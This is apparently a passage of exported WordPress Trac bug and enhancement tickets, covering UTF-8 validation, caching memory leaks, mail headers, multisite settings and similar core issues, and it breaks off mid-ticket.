29717 wp_check_invalid_utf8 - pcre tricks and failsafes, +mb_convert_encoding, iconv fix, performance Formatting normal normal Awaiting Review enhancement new needs-unit-tests 2014-09-20T17:18:13Z 2019-05-18T07:49:17Z "Used in core in these 4 functions. * esc_attr() * esc_js() * esc_html() * sanitize_text_field() It's the first function to execute for all 4, and especially for sanitize_text_field it gets called quite a bit and is pretty important. It's purpose is to check a string for invalid utf. It utilizes preg_match with the '/u' modifier to parse both the pattern and subject for utf. PCRE automatically checks both the pattern and subject for invalid utf, upon which it will exit with an error code/constant. The changes here: Normally pcre is compiled with utf support. It can also be compiled to disallow utf support, and it can be compiled without utf support. If utf is compiled and enabled the '/u' modifier for preg_match is available which turns on the automatic utf validation. For older dists or those with utf support turned off at compile, there is a trick to enable the same functionality as the '/u' provides. http://www.pcre.org/pcre.txt In order process UTF-8 strings, you must build PCRE to include UTF-8 support in the code, and, in addition, you must call pcre_compile() with the PCRE_UTF8 option flag, or the pattern must start with the sequence (*UTF8). When either of these is the case, both the pattern and any subject strings that are matched against it are treated as UTF-8 strings instead of strings of 1-byte characters. So the first change to this function was to allow a fallback to that pattern option trick in case '/u' wasnt supported. 1. `@preg_match( '//u', '' ) !== false` 2. `@preg_match( '/(*UTF8)/', '' ) !== false` 3. Fallback to a regex that doesn't require UTF support, instead of using pcre utf validation it searches for it I also wanted it to have better performance, especially due to its use in those 4 core functions I use often. I benchmarked it pretty thoroughly to try and gain more speed. This patch is about 10-20% faster. Many gains were from refactoring the logic and control structures, chaining within if statements using bools, and utilizing the static variables to the fullest. This is especially crucial since this function gets called repeatedly. I also gained some cycles by replacing an in_array() check with a `stripos`. One of the bigger gains came from replacing the `strlen( $string ) == 0` that ran on every run with. Since the $string variable was already casted to a string, that should always work and keep things a little cheaper. {{{ $string = (string) $string; // if string length is 0 (faster than strlen) return empty if ( ! isset( $string[0] ) ) return ''; }}} The final change was to the 2nd parameters $strip, which if true is supposed to strip the invalid utf out of the string and return the valid. In core nowhere is that parameter being used (yet), which explains the deprecated looking iconv. Also added a fallback to use mb_convert_encoding in case iconv is missing. {{{ // try to use iconv if exists if ( function_exists( 'iconv' ) ) return @iconv( 'utf-8', 'utf-8//ignore', $string ); // otherwise try to use mb_convert_encoding, setting the substitue_character to none to mimic strip if ( function_exists( 'mb_convert_encoding' ) ) { @ini_set( 'mbstring.substitute_character', 'none' ); return @mb_convert_encoding( $string, 'utf-8', 'utf-8' ); } }}} Here are some of the test strings I used, I also used the utf-8-test file at http://www.cl.cam.ac.uk/~mgk25/ucs/examples/UTF-8-test.txt. I did testing on 4.0 using php 5.6, 5.4, 5.3, and 5.4. I verified the output and the strip feature as well. For all tests I had php error_reporting set to the max: {{{ ini_set( 'error_reporting', 2147483647 ); }}} {{{ $valid_utf = array( ""\xc3\xb1"", // 'Valid 2 Octet Sequence' ""\xe2\x82\xa1"", // 'Valid 3 Octet Sequence' => ""\xf0\x90\x8c\xbc"", // 'Valid 4 Octet Sequence' => ""\xf8\xa1\xa1\xa1\xa1"", //'Valid 5 Octet Sequence (but not Unicode!)' => ""\xfc\xa1\xa1\xa1\xa1\xa1"", //'Valid 6 Octet Sequence (but not Unicode!)' => ""Iñtërnâtiônàlizætiøn\xf0\x90\x8c\xbcIñtërnâtiônàlizætiøn"", // valid four octet id 'Iñtërnâtiônàlizætiøn', // valid UTF-8 string ""\xc3\xb1"", // valid two octet id ""Iñtërnâtiônàlizætiøn\xe2\x82\xa1Iñtërnâtiônàlizætiøn"", // valid three octet id ); $invalid_utf = array( ""\xc3\x28"", //'Invalid 2 Octet Sequence' => ""\xa0\xa1"", //'Invalid Sequence Identifier' => ""\xe2\x28\xa1"", //'Invalid 3 Octet Sequence (in 2nd Octet)' => ""\xe2\x82\x28"", //'Invalid 3 Octet Sequence (in 3rd Octet)' => ""\xf0\x28\x8c\xbc"", //'Invalid 4 Octet Sequence (in 2nd Octet)' => ""\xf0\x90\x28\xbc"", // 'Invalid 4 Octet Sequence (in 3rd Octet)' => ""\xf0\x28\x8c\x28"", //'Invalid 4 Octet Sequence (in 4th Octet)' => chr(0xE3) . chr(0x80) . chr(0x22), // Invalid malformed because 0x22 is not a valid second trailing byte following the leading byte 0xE3. http://www.unicode.org/reports/tr36/ chr(0xF8) . chr(0x80) . chr(0x80) . chr(0x80) . chr(0x80), // Invalid UTF-8, overlong 5 byte encoding. chr(0xD0) . chr(0x01), // High code-point without trailing characters. chr(0xC0) . chr(0x80), // Overlong encoding of code point 0 chr(0xF8) . chr(0x80) . chr(0x80) . chr(0x80) . chr(0x80), // Overlong encoding of 5 byte encoding chr(0xFC) . chr(0x80) . chr(0x80) . chr(0x80) . chr(0x80) . chr(0x80), // Overlong encoding of 6 byte encoding chr(0xD0) . chr(0x01), // High code-point without trailing characters ""Iñtërnâtiôn\xe9àlizætiøn"", // invalid UTF-8 string ""Iñtërnâtiônàlizætiøn\xfc\xa1\xa1\xa1\xa1\xa1Iñtërnâtiônàlizætiøn"", // invalid six octet sequence ""Iñtërnâtiônàlizætiøn\xf0\x28\x8c\xbcIñtërnâtiônàlizætiøn"", // invalid four octet sequence ""Iñtërnâtiônàlizætiøn \xc3\x28 Iñtërnâtiônàlizætiøn"", // invalid two octet sequence ""this is an invalid char '\xe9' here"", // invalid ASCII string ""Iñtërnâtiônàlizætiøn\xa0\xa1Iñtërnâtiônàlizætiøn"", // invalid id between two and three ""Iñtërnâtiônàlizætiøn\xf8\xa1\xa1\xa1\xa1Iñtërnâtiônàlizætiøn"", // invalid five octet sequence ""Iñtërnâtiônàlizætiøn\xe2\x82\x28Iñtërnâtiônàlizætiøn"", // invalid three octet sequence third ""Iñtërnâtiônàlizætiøn\xe2\x28\xa1Iñtërnâtiônàlizætiøn"", // invalid three octet sequence second ); }}} ---- Notes and more info: {{{ In order process UTF-8 strings, you must build PCRE to include UTF-8 support in the code, and, in addition, you must call pcre_compile() with the PCRE_UTF8 option flag, or the pattern must start with the sequence (*UTF8). When either of these is the case, both the pattern and any subject strings that are matched against it are treated as UTF-8 strings instead of strings of 1-byte characters. UTF-8 was devised in September 1992 by Ken Thompson, guided by design criteria specified by Rob Pike, with the objective of defining a UCS transformation format usable in the Plan9 operating system in a non- disruptive manner. Char. number range | UTF-8 octet sequence (hexadecimal) | (binary) --------------------+--------------------------------------------- 0000 0000-0000 007F | 0xxxxxxx 0000 0080-0000 07FF | 110xxxxx 10xxxxxx 0000 0800-0000 FFFF | 1110xxxx 10xxxxxx 10xxxxxx 0001 0000-0010 FFFF | 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx A UTF-8 string is a sequence of octets representing a sequence of UCS characters. An octet sequence is valid UTF-8 only if it matches the following syntax, which is derived from the rules for encoding UTF-8 and is expressed in the ABNF of [RFC2234]. UTF8-octets = *( UTF8-char ) UTF8-char = UTF8-1 / UTF8-2 / UTF8-3 / UTF8-4 UTF8-1 = %x00-7F UTF8-2 = %xC2-DF UTF8-tail UTF8-3 = %xE0 %xA0-BF UTF8-tail / %xE1-EC 2( UTF8-tail ) / %xED %x80-9F UTF8-tail / %xEE-EF 2( UTF8-tail ) UTF8-4 = %xF0 %x90-BF 2( UTF8-tail ) / %xF1-F3 3( UTF8-tail ) / %xF4 %x80-8F 2( UTF8-tail ) UTF8-tail = %x80-BF }}} * http://www.pcre.org/pcre.txt * http://us1.php.net/manual/en/pcre.constants.php * http://www.cl.cam.ac.uk/~mgk25/unicode.html#utf-8 * http://en.wikipedia.org/wiki/Unicode * http://unicode.org/faq/utf_bom.html * http://www.unicode.org/versions/Unicode6.1.0/ch03.pdf * http://www.pcre.org/pcre.txt * http://tools.ietf.org/rfc/rfc3629.txt * http://www.unicode.org/faq/utf_bom.html * http://www.unicode.org/versions/Unicode5.2.0/ch03.pdf * http://www.unicode.org/reports/tr36/ * http://tools.ietf.org/rfc/rfc3629.txt Related Tickets: * https://core.trac.wordpress.org/ticket/11175 * https://core.trac.wordpress.org/ticket/28786 " askapache Future Releases 50944 wp_calculate_image_srcset can unintentionally include unscaled original image Media 4.4 normal normal Awaiting Review defect (bug) new dev-feedback 2020-08-12T14:08:33Z 2020-08-24T21:33:22Z "In `wp-includes/media.php`, `wp_calculate_image_srcset` seems to add the original image to the srcset string if the width is smaller than `$max_srcset_image_width` and if the image isn't a GIF. This isn't desirable since the original image is uncompressed and I don't even think it's intentional. This behavior seems to have been introduced in this patch: https://core.trac.wordpress.org/changeset/35561. From what I can tell, the if statement should read like this: {{{#!php if ( ! isset( $image_sizes['thumbnail']['mime-type'] ) || 'image/gif' === $image_sizes['thumbnail']['mime-type'] ) { }}} The current code will include the original image whenever the thumbnail IS NOT a GIF. This seems to be opposite to the desired behavior? " fredrikll Future Releases 44445 wp_cache_init() and WP_Object_Cache constructor has a memory leak Cache API 2.2 normal normal Awaiting Review defect (bug) new dev-feedback 2018-06-24T05:00:47Z 2019-05-03T17:45:12Z "When calling `wp_cache_init()` repeated in unit testing the WP_Object_Cache::__contruct() repeatedly registers '__destruct' as a shutdown function, and each time it does it leaks memory. There is a @todo comment above the `register_shutdown_hook()` that says the following so I would assume that this is no longer needed and we could just delete the line with the register_shutdown_hook()? ''This should be moved to the PHP4 style constructor, PHP5 already calls __destruct()'' I will upload a patch to delete the list, and a different patch to only call `register_shutdown_hook()` once, depending on what is appropriate." MikeSchinkel Future Releases 52582 wp_cache_* duplicate/redundant storage and insufficient clearing of cache Comments normal normal Awaiting Review defect (bug) new dev-feedback 2021-02-21T14:32:09Z 2021-02-21T16:07:12Z "This is something I'm currently encountering, but have not been able to fully investigate myself (yet). **Summarized backstory; ** Using Redis, sometimes maxes memory > needs flush. Started investigating whats taking up soo much memory (relatively simple sites). ~42,000/67,000 records stored are for `get_comment_child_ids` and `get_comments`. (By far not that many comments on my sites) Looking for a single specific comment ID it is repeated between 30-50 times, while in theory it should be just once (unless using it in different contexts? (->query_vars)) **Possible cause; ** For the methods `get_comments` and `fill_descendants` the `wp_cache_get_last_changed( 'comment' );` is used to create a cache key for the comments / childs. https://core.trac.wordpress.org/browser/tags/5.6.1/src/wp-includes/class-wp-comment-query.php#L432 https://core.trac.wordpress.org/browser/tags/5.6.1/src/wp-includes/class-wp-comment-query.php#L998 When a new comment is inserted for example, there is a attempt to delete the comment cache by calling `clean_comment_cache()`, but it seems this is based on the comment ID, which is not the same as the key / doesn't target the childs. The 'last_changed' is however changed at the same time in that function; https://core.trac.wordpress.org/browser/tags/5.6.1/src/wp-includes/comment.php#L3195 Which I think makes it impossible for the prior cached data to be found because it uses that in the key. This causes it to store the same data over and over (redundant), even when it hasn't changed for those comments, with new cache keys without clearing the old ones (duplicate). Could be I'm completely off, but wanted to get another pair of eyes on it. If whats described is actually happening it looks pretty major for caching efficiency. " sormano Future Releases 57797 WP_Block_Type_Registry::register issues incorrect error message when block.json folder doesn't exist General 6.1.1 normal normal Awaiting Review defect (bug) new dev-feedback 2023-02-23T16:19:42Z 2023-03-07T16:18:54Z "I called {{{#!php register( $block_type, $args ); } }}} I see ->register is still called even though the call to file_exists() fails " Tonygirling Future Releases 46794 wp_authenticate_email_password fails due to incorrect evaluation of $user object Users 5.1 normal normal Awaiting Review defect (bug) new dev-feedback 2019-04-04T11:16:40Z 2019-04-05T14:00:12Z "While testing an authentication method that uses wp_authenticate where I was passing in a correct email address and password combination that was failing, I traced the code through to the wp_authenticate_email_password method in wp_includes/user.php in wp 5.1.1. Line 251 executes wp_check_password with $password, $user->user_pass and $user->ID, however $user->user_pass does not exist in $user, rather it exists in $user->data->user_pass. See attachments for Xdebug code and local variables. " Csassaf Future Releases 41990 wp_add_inline_script() does not print if the handler has already processed Script Loader 4.5 normal normal Future Release defect (bug) new dev-feedback 2017-09-26T06:05:37Z 2023-04-12T04:51:08Z "If the wp_add_inline_script() function (with 'after' position set) is called after the head scripts have already been printed and the handler specified on wp_add_inline_script() is part of the head printed scripts, the code is not added later in the footer. Probably it should. Example a plugin which implements a shortcode needs to add some jquery inline statement only when the shortcode is executed (to add the js code only on relevant pages). It enqueues jquery to be added in the footer and a piece of inline script. But another plugin or the theme enqueues jquery in the header (as many do): the above inline code is not printed but it actually does not need to be exactly after the jquery inclusion. Stefano." satollo Future Releases 23020 wp.getPageList should act like wp.getPages XML-RPC 2.2 normal normal defect (bug) new dev-feedback 2012-12-20T13:47:13Z 2019-06-05T06:39:01Z "I know that wp.getPageList is obsolete, but I think it should act like wp.getPages At the moment wp.getPageList returns even the trashed pages and doesn't return the status of the page. The weird behavior i've seen with wp.getPageList on a third-party client is shown below: - Refresh the pages list. - The Page 'A' is in the list. - Select the page 'A' and delete it. - Refresh the pages list and the page is still there. Doh!" daniloercoli Future Releases 44991 wp-login.php postpass no redirect Posts, Post Types 4.9.8 normal normal Awaiting Review defect (bug) new dev-feedback 2018-09-25T14:52:12Z 2018-09-26T17:47:34Z "I'm running wordpress 4.9.8 on an Archlinux host. Whenever I try to password protect a post, the redirection after entering the correct password fails. Going back to the post using the browser history works, and the post is unlocked, but only a blank page is visible to the user after entering the password. I suspect {{{ wp_get_referer(); }}} to be the root of the problem. I've added some debug output to the code: {{{ $referer = wp_get_referer(); if ( $referer ) { $secure = ( 'https' === parse_url( $referer, PHP_URL_SCHEME ) ); print ""True""; } else { $secure = false; print ""False""; } }}} and it prints ""False"" on that formerly blank white page after entering the password. Also adding {{{ print $referer; print $_SERVER['HTTP_REFERER']; }}} to the code prints nothing. I've tested different up-to-date browsers: Firefox, Chromium on Linux, Firefox, Opera on Windows 8.1, Firefox Klar, Safari on iOS, to no avail. Only Internet Explorer on Windows 8.1 works as expected, the redirect occurs immediately. Any ideas what could cause this problem, or how to further debug this?" lukelr Future Releases 36239 wp-embed image size is using the smallest image or it sometimes uses the one for featured images Embeds 4.4.2 normal normal Awaiting Review defect (bug) new dev-feedback 2016-03-14T19:48:48Z 2020-09-25T19:44:53Z When using the wp-embed in my custom post types the image size is correct, a bit big, but it's not blurry. In regular posts, the image size is the thumbnail size created for the media library thumbnail (not the one in the media settings) because that happens to be the smallest one. I noticed that for posts, whatever is the smallest image is being used, whether set in the functions file or by WordPress. carasmo Future Releases 55607 wp-config overrides of WP_HOME and WP_SITEURL are forgotten when installing MultiSite. Networks and Sites 3.0 normal normal Awaiting Review enhancement new dev-feedback 2022-04-22T18:37:42Z 2022-12-03T20:03:10Z "The chain of events I encountered when playing with WordPress on my home server. 1. Installed WP successfully. 2. I changed the two URL settings to the wrong value by accident. 3. Tried logging back into the admin panel, but I kept being redirected to the wrong place, the one I had mis-typed. 4. Google'd for a fix that would avoid my having to reinstall from scratch and found you can override these two settings in wp-config. I added the correct values for WP_HOME and WP_SITEURL. 5. Finding access to my website restored, I forgot about the two settings editable on the setting panel. 6. I switched on Multi-Site by setting WP_ALLOW_MULTISITE in wp-config. 7. I followed the Network-Setup panel, opting for subfolders. (The sample code to paste into wp-config had the correct name for DOMAIN_CURRENT_SITE.) 8. I followed the instructions to update both wp-config and .htaccess. 9. I went to the login page and saw the page layout was all messed up. Investigating, I found the CSS etc links were all to the mistyped URL I had typed back in step 2. Note, after restoring the htaccess and wp-config (but keeping my WP_HOME and WP_SITEURL changes) I found I could not update the wrong settings in the DB, as both text boxes were greyed out. WP multi-site appears to have some reference one of the two URL settings in the database. This should defer to the replacement settings in wp-config." billpg Future Releases 44429 WP-CLI incompatibility with wp_redirect( https://... ) General normal major Awaiting Review defect (bug) new dev-feedback 2018-06-21T20:43:31Z 2018-07-24T12:28:57Z "Hello, My wordpress wouldn't update and I see errors below, I also trying to update my site URL to include www to it but I can't change it due update failure. {{{ Warning: The system could not load some of this WordPress installation’s data. Certain sections of this interface may not function correctly. (XID nw85up) The system failed to run the wp-cli batch commands with the following issues: Warning: Some code is trying to do a URL redirect. Backtrace: #0 WP_CLI\Utils\wp_redirect_handler(https://) #1 call_user_func_array(WP_CLI\Utils\wp_redirect_handler, Array ([0] => https://)) called at [/home/rsed43dqsw/public_html/wp-includes/class-wp-hook.php:288] #2 WP_Hook->apply_filters(https://, Array ([0] => https://,[1] => 301)) called at [/home/rsed43dqsw/public_html/wp-includes/plugin.php:203] #3 apply_filters(wp_redirect, https://, 301) called at [/home/rsed43dqsw/public_html/wp-includes/pluggable.php:1196] #4 wp_redirect(https://, 301) called at [/home/rsed43dqsw/public_html/wp-content/plugins/force-https-littlebizzy/core/redirect.php:91] #5 FHTTPS_Core_Redirect->redirect() called at [/home/rsed43dqsw/public_html/wp-content/plugins/force-https-littlebizzy/core/redirect.php:68] #6 FHTTPS_Core_Redirect->start() #7 call_user_func_array(Array ([0] => FHTTPS_Core_Redirect Object (),[1] => start), Array ([0] => )) called at [/home/rsed43dqsw/public_html/wp-includes/class-wp-hook.php:286] #8 WP_Hook->apply_filters(, Array ([0] => )) called at [/home/rsed43dqsw/public_html/wp-includes/class-wp-hook.php:310] #9 WP_Hook->do_action(Array ([0] => )) called at [/home/rsed43dqsw/public_html/wp-includes/plugin.php:453] #10 do_action(plugins_loaded) called at [/home/rsed43dqsw/public_html/wp-settings.php:327] #11 require(/home/rsed43dqsw/public_html/wp-settings.php) called at [phar:///usr/local/cpanel/3rdparty/share/wp-cli/wp-cli.phar/php/WP_CLI/Runner.php:1174] #12 WP_CLI\Runner->load_wordpress() called at [phar:///usr/local/cpanel/3rdparty/share/wp-cli/wp-cli.phar/php/WP_CLI/Runner.php:1100] #13 WP_CLI\Runner->start() called at [phar:///usr/local/cpanel/3rdparty/share/wp-cli/wp-cli.phar/php/WP_CLI/Bootstrap/LaunchRunner.php:23] #14 WP_CLI\Bootstrap\LaunchRunner->process(WP_CLI\Bootstrap\BootstrapState Object ([] => Array ())) called at [phar:///usr/local/cpanel/3rdparty/share/wp-cli/wp-cli.phar/php/bootstrap.php:75] #15 WP_CLI\bootstrap() called at [phar:///usr/local/cpanel/3rdparty/share/wp-cli/wp-cli.phar/php/wp-cli.php:23] #16 include(phar:///usr/local/cpanel/3rdparty/share/wp-cli/wp-cli.phar/php/wp-cli.php) called at [phar:///usr/local/cpanel/3rdparty/share/wp-cli/wp-cli.phar/php/boot-phar.php:8] #17 include(phar:///usr/local/cpanel/3rdparty/share/wp-cli/wp-cli.phar/php/boot-phar.php) called at [/usr/local/cpanel/3rdparty/share/wp-cli/wp-cli.phar:4]" ecahost7 Future Releases 10631 "wp-admin/users.php does not show pages under ""posts"" column" Users 2.8.4 normal normal Awaiting Review defect (bug) reopened dev-feedback 2009-08-16T18:51:20Z 2022-05-13T22:07:25Z "For some reason, the SQL query in '''wp-includes/user.php''' that gets the count of a user's posts excludes pages, so '''/wp-admin/users.php''' will not show an accurate picture of a user's contributions. This makes no sense at all: 1. posts and pages are first-class content types in WordPress and 2. they are both stored in the same table. Proposed solution: remove {{{ AND post_type = 'post' }}} from '''function get_usernumposts''' in '''wp-includes/user.php'''. This defect could result in incorrect interpretation of user activity, so marked as major severity." novasource Future Releases 60407 WP Starter Page is a source for HACKERS Build/Test Tools 6.4.3 normal critical Awaiting Review feature request new dev-feedback 2024-01-31T21:40:44Z 2024-01-31T21:40:44Z "I am convinced that the WP starter page, with the BOLG option is the source for all and any hacker to hack a site. Prove me wrong: Example, I have had my website online for 20 years, I have used several different website dev. Apps. I have never been hacked. After setting up WP on my sites; 3 to be exact, I soon started to get spam emails from the comment section of the blog. I am not a website programmer, btw, I had no idea where these comments. were being submit, I looked at the pages on my dashboard and there was nothing there. I kept looking, granted not a lot because it didn't concern me. But the SPAM was annoying and often inappropriate. Eventually when my site(s) were hacked and shut down, I found the hidden blog page, and deleted it. Because my sites were shut down this was a challenge. I still continued to get SPAM even after shutting down the blog comment page. My other 2 sites were still getting comments. It took a bit of sleuthing to find this hidden blog page on each site, You cant edit it either, WP has embedded the comment section. Eventually I deleted them all, but I still had 3 hacked sites. recently I deleted one of the site and reinstalled WP. And guess what, even though I though I deleted the WP Blog page, I started to immediately get SPAM and the site was hacked. OK point being SHUT DOWN THE AUTOMATICALLY AND HIDDEN BLOG PAGE, SHUT DOWN THE COMMENTS UNLESS YOUR POINT IS FOR US TO GET HACKED!!! I AM CONVINCED THIS IS A SERIOUS PROBLEM THAT YOU HAVE TO FIX. Your welcome to drop me an email, that hopefully isnt spam, to let me know you are fixing this gateway for hackers. Thanks Jimmy" dpmatlosz Future Releases 40352 WP REST API, Comments Not Triggering 'comment_post' Comments 4.7 normal normal Awaiting Review defect (bug) new dev-feedback 2017-04-04T06:50:37Z 2019-11-26T14:44:32Z "Hello, I’ve noticed that when comments are created using the WP API that notification emails are not sent out to the author of the post or moderators. (When testing, If I add the comment via the admin interface, it works as expected). On debugging, I noticed that the filter ‘comment_post’ is not being called when inserted via the API. For now, I used the following workaround: {{{#!php function mytheme_comment_inserted($comment_id, $comment_object) { wp_notify_postauthor( $comment_id ); } add_action('wp_insert_comment','mytheme_comment_inserted'); }}} I already posted on the support forum here: https://wordpress.org/support/topic/wp-api-comments-not-sending-notifications/#post-8987973 and it was suggested this could be intentional behaviour but that this also could, in fact, be reported as a bug? Thanks! Chris" stickypixel Future Releases 45052 WP Oembed in multisite fail when the permalink structure is not default SergeyBiryukov Embeds normal normal Future Release defect (bug) reviewing dev-feedback 2018-10-05T05:36:34Z 2019-04-11T17:37:07Z "This is a follow up of #40673 In case blogs are using pretty urls (which should be the most common case), when you try to embed a post from the main site into a sub site, the embedded URL is not interpreted and we keep that simple URL. Thats because the main site is using a reserved blog prefix {{{/blog}}} we need to remove before using {{{get_sites()}}}. I've added a unit test to illustrate the bug." imath Future Releases 22837 "WP Needs to Set ""Sender"" and ""Reply-To"" or DKIM/DMARC will not work using wp-mail (via PHPMailer)" Mail 3.4.2 high major Awaiting Review defect (bug) new close 2012-12-09T17:23:48Z 2023-11-28T19:33:30Z "I notice that for DKIM to function (while using DMARC) correctly for outgoing mail the PHPMailer object needs to make sure the Sender and Reply-To fields match the ""From"" field otherwise the ""Return-Path"" header uses the server it is sending from causing a mismatch. When this happens DKIM fails authentication on the receiver side because it is not added to outgoing mail. I tried adding the reply-to and sender header manually to wp_mail() but it did not work. One had to do the following: Right now i have to manually modify the /wp-includes/pluggable.php file in the wp_mail() function to include: {{{ if (strlen($phpmailer->Sender)==0) { $phpmailer->Sender = $phpmailer->From; $phpmailer->AddReplyTo($phpmailer->From); } }}} This resolves the problem and DKIM works again. " kellogg9 Future Releases 54006 Wp Multisite Get, Add, Update and Delete Site Meta Issue. Options, Meta APIs 5.8 normal normal Awaiting Review defect (bug) new dev-feedback 2021-08-25T16:26:30Z 2021-08-27T14:21:30Z "Just working on some code to help with WP Multisite integration... I have noticed that the `add_site_meta` function is currently not working. I had a look through the functions in wp-includes/ms-site.php and found that the first parameter in the 'add_metadata' function called by add_site_meta (line 1012) is 'blog'. I figured since you changed the blogmeta table to sitemeta that something might be amiss. If the metadata is added thus: add_metadata( 'site', 1, 'test_site_feta', 'cheese', false ); All appears to work okay, however this does not; add_metadata( 'blog', 1, 'test_site_feta', 'cheese', false ); Think its a bug...until I had a closer look I had to use MySQL queries to add the site meta. " leeml Future Releases 55206 wp core api memory leaks Database normal normal Awaiting Review defect (bug) assigned dev-feedback 2022-02-20T05:37:43Z 2022-04-29T04:44:55Z "I've experienced the following two memory leaks in WP core. One involves $wpdb when `SAVEQUERIES` is defined truthy, and the other involves `$wp_object_cache` growing as a consequence of calling core api functions that themselves save to the object cache. Both have happened for me in cases where I'm doing large batch processing involving thousands or tens of thousands of posts. I've had memory usage exceed 512MB and cause crashes. I'm including unit tests here showing each memory leak and also the fix that I've used to prevent the memory leak and keep my batch jobs running. {{{#!php queries particularly has a tendency to blow up. */ class WP_Memory_Leak_Tests extends WP_UnitTestCase { /** * This tests a condition which exposes a memory leak in the WPDB class. * If 'SAVEQUERIES' is defined as truthy, then the $wpdb->queries property * can grow indefinitely. */ public function test_WPDB_Memory_Leak() { // Once a constant is defined, it can't be undefined, it's often defined in dev or staging environments. define( 'SAVEQUERIES', true ); // I'll just start my cron job to read the import file I've got. It's // got a decent number of records. $number_of_records = 1000; global $wpdb; $memory = memory_get_usage( true ); $peak = memory_get_peak_usage( true ); foreach ( [ 'first', 'second' ] as $pass ) { // first pass through, we'll apply a fix for this memory leak. // second pass through, we'll bypass the fix and the tests will fail. for ( $i = 1; $i <= $number_of_records; $i ++ ) { if ( 'first' === $pass ) { $wpdb->queries = []; } // for this test, we'll do direct calls to $wpdb $wpdb->query( $wpdb->prepare( ""SELECT * FROM $wpdb->posts WHERE ID = %d"", $i ) ); } $this->assertEquals( $memory, memory_get_usage( true ), ""$pass pass"" ); $this->assertEquals( $peak, memory_get_peak_usage( true ), ""$pass pass"" ); } } /** * This tests a condition which exposes a memory leak in wp cache API. If * a large batch job attempts to do a lot of something that ends up caching * things ( like, for example, get_post or wp_insert_post ), then unless * the cache is flushed regularly, the memory usage grows indefinitely. */ public function test_WP_Cache_Memory_Leak() { // I'll just start my cron job to read the import file I've got. It's // got a decent number of records. $number_of_records = 1000; global $wpdb; $memory = memory_get_usage( true ); $peak = memory_get_peak_usage( true ); foreach ( [ 'first', 'second' ] as $pass ) { // first pass through, we'll apply a fix for this memory leak. // second pass through, we'll bypass the fix and the tests will fail. for ( $i = 1; $i <= $number_of_records; $i ++ ) { if ( 'first' === $pass ) { wp_cache_flush(); } // Because our last test defined 'SAVEQUERIES', we need to // always apply this fix, otherwise that memory leak manifests. // With us doing a core API function `wp_insert_post`, the number // of queries is quite large and memory __really__ grows. $wpdb->queries = []; // let's say we're inserting posts, maybe from an excel file. // this caches some things, so $wp_object_cache grows. wp_insert_post([ 'post_type' => 'post', 'post_title' => ""post $i"", 'post_content' => ""pass $pass"" ]); } $this->assertEquals( $memory, memory_get_usage( true ), ""$pass pass"" ); $this->assertEquals( $peak, memory_get_peak_usage( true ), ""$pass pass"" ); } } } }}} " sllimrovert Future Releases 44347 WP allows creating username that is already used email address Users normal normal Awaiting Review enhancement new needs-unit-tests 2018-06-10T22:43:02Z 2019-03-02T02:03:26Z "As reported in Support Forum (https://wordpress.org/support/topic/wp-allows-creating-username-that-is-already-used-email-address/) it seems I can create a user with wp_create_user where the user's ""username"" is set as a value that is an existing Email Address for another user in the WordPress system. (I have not submitted a bug here before, so let me know if more info is needed on this and what to do next)." phillipburger Future Releases 41288 wp admin bar WordPress about and updates icon can't show in Smartphone. Toolbar 4.9 normal normal Awaiting Review enhancement new dev-feedback 2017-07-11T09:26:39Z 2024-02-29T20:42:30Z WordPress admin side WordPress about and Updates can't show in smartphone it should be display none in Very narrow screens.that can be helpfully for smartphone user. mp518 Future Releases 57366 WP 6.1 - Performance Regression Cache API 6.1.1 normal normal Awaiting Review defect (bug) new dev-feedback 2022-12-21T12:45:49Z 2023-04-20T13:25:04Z "Hi team, I am experiencing some significant performance regression when I upgrade from 6.0 to 6.1 (and 6.1.1). Page load time roughly triples across the site. I do not have a profiler running but using Query Monitor I can see a significant increases in object cache hits (14k to 110k). I understand this is partially expected due to the caching improvements. I am running a fairly large (170k posts) site with Woocommerce and a number of plugins. I am happy to provide more detailed analysis but not sure what is the best profiling tool or method to understand where the regression is coming from. If you can provide some guidance I will try to collect more data. Thanks, Jason" galapogos01 Future Releases 35517 Work around PHP7 php-ssh2 breakage Filesystem API normal normal Awaiting Review defect (bug) new dev-feedback 2016-01-18T20:46:22Z 2023-06-27T06:41:29Z "There is an updated php-ssh2 package available for PHP7, but it currently breaks the WordPress updater functionality for `class-wp-filesystem-ssh2.php`. The root cause seems to be that it has not correctly implemented the PHP stream wrappers for the `stat()` call, and any dependent functions such as `is_file()`, `is_dir()`, `file_exists()`, etc. However, the `ssh2_sftp_stat()` function does work, and we can deduce the other information from it. I've filed a bug against the php-ssh2 extension (https://bugs.php.net/bug.php?id=71376), but I wondered if using `ssh2_sftp_stat()` might be better, in general, than depending on the PHP stream wrapper functionality. " dougal Future Releases 23866 WordPress xmlrpc wp_getPosts filter for slug XML-RPC 3.4 normal normal enhancement new dev-feedback 2013-03-26T20:09:31Z 2019-06-05T06:39:12Z "When using the Wordpress xmlrpc, it is sometimes very useful to get posts based off of slugs rather than post id. A use case for this would be synchronizing or migrating two Wordpress sites with the same posts, but with different databases and post ID's. " SunWaves Future Releases 42381 Wordpress update does not check if database structure/scheme on existing site is equal to how it would be on a new install Database 4.8.2 normal normal Awaiting Review defect (bug) new dev-feedback 2017-10-30T18:19:44Z 2017-11-11T18:19:31Z "'''Description of bug''' When trying to add a category I receive the error: WordPress database error: [Duplicate entry ‘test’ for key ‘slug’] INSERT INTO wp_terms (name, slug, term_group) VALUES (‘Test’, ‘test’, 0) '''What seems to be the cause of the problem?''' My install does not allow a category (test) with the same slug as an existing tag (test). WordPress should allow this. On further investigation: in wp_terms table, the field slug has a UNIQUE constraint. This was changed in WordPress 4.1 [https://core.trac.wordpress.org/ticket/22023/ three years ago]. Duplicates are now prevented in WordPress code instead of in the database, but it seems like my site has skipped one or more database core updates. '''In short''' My install is up to date. But my database core structure/scheme is not up to date. wp_repair, wp_optimize etc. do not flag this. Also setting WP_ALLOW_REPAIR in wp-config.php does not flag this as an issue. I was able to fix this but potentially my database still has other undetected differences. Questions - Should WordPress check on update if a existing database structure/scheme matches how it should be if it were new install? - Should WordPress offer (after backup disclaimer etc.) offer to repair/update the database structure to the latest version? I submit this as a bug and not as a feature since I feel WP_ALLOW_REPAIR should detect if a WordPress table is setup correctly." mike_vl Future Releases 47452 WordPress taking time to login and throwing time-out error on upgrading Upgrade/Install 5.2.1 normal critical Awaiting Review defect (bug) new dev-feedback 2019-06-01T07:08:56Z 2022-11-15T18:21:31Z "**Description**: When new updates are available, I upgraded to the new version but after the upgrade successful, I still see the upgrade version and after that WordPress started working very slow. Any operation performed on the platform will take more time to load and sometimes it comes up with ""connection time out"" error too. **Steps to reproduce** 1. Check for update 